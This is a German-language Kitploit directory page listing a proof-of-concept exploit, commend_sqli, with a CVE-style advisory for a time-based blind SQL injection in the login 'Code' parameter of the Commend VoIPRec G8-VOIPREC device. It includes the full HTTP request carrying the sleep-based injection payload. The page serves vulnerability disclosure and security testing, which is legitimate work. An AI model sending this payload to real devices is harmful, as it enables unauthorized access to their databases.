Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
commend_sqli — Proof-of-Concept-Exploit für zeitbasierte Blind-SQL-Injection im Commend VoIPRec G8-VOIPREC-Gerät, das den anfälligen Code-Parameter zur Datenbankmanipulation angreift. | Kitploit
Tools/GitHubGitHub/jet-pentest/commend_sqli
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstests
GitHubjet-pentest/commend_sqli

commend_sqli

Proof-of-Concept-Exploit für zeitbasierte Blind-SQL-Injection im Commend VoIPRec G8-VOIPREC-Gerät, das den anfälligen Code-Parameter zur Datenbankmanipulation angreift.

Repository anzeigen
3vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2023-XXXXX

[Vorgeschlagene Beschreibung]

Die Weboberfläche von G8-VOIPREC (Commend VoIPRec) ist anfällig für zeitbasierte blinde SQL-Injektionen im Parameter „Code“ auf der Anmeldeseite.

[Zusätzliche Informationen]

PoC:

POST /cgi-bin/SecComRecX.cgi HTTP/1.1 Host: 192.168.88.10 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: application/json, text/javascript, /; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Content-Length: 78 Origin: http://192.168.88.10 Connection: close Referer: http://192.168.88.10/ComRecX/comrecxapp.html

Action=request&Code=userpasswordasdasd'%2b(select*from(select(sleep(6)))a)%2b'

[Schwachstellentyp]

SQL Injection

[Produktanbieter]

Commend International

[Betroffene Produktcodebasis]

G8-VOIPREC

[Angriffsart]

Remote

[Auswirkung Offenlegung von Informationen]

true

[Angriffsvektoren]

Ein Remote-Benutzer kann schädlichen SQL-Code zur Manipulation der Backend-Datenbank verwenden, um auf Informationen zuzugreifen, die nicht zur Anzeige vorgesehen waren.

[Entdecker]

Alexander Starikov (Jet Infosystems, jet.su), Ivashchenko Sergey (Jet Infosystems, jet.su)

[Referenz]

https://www.commend.com/

Tool herunterladen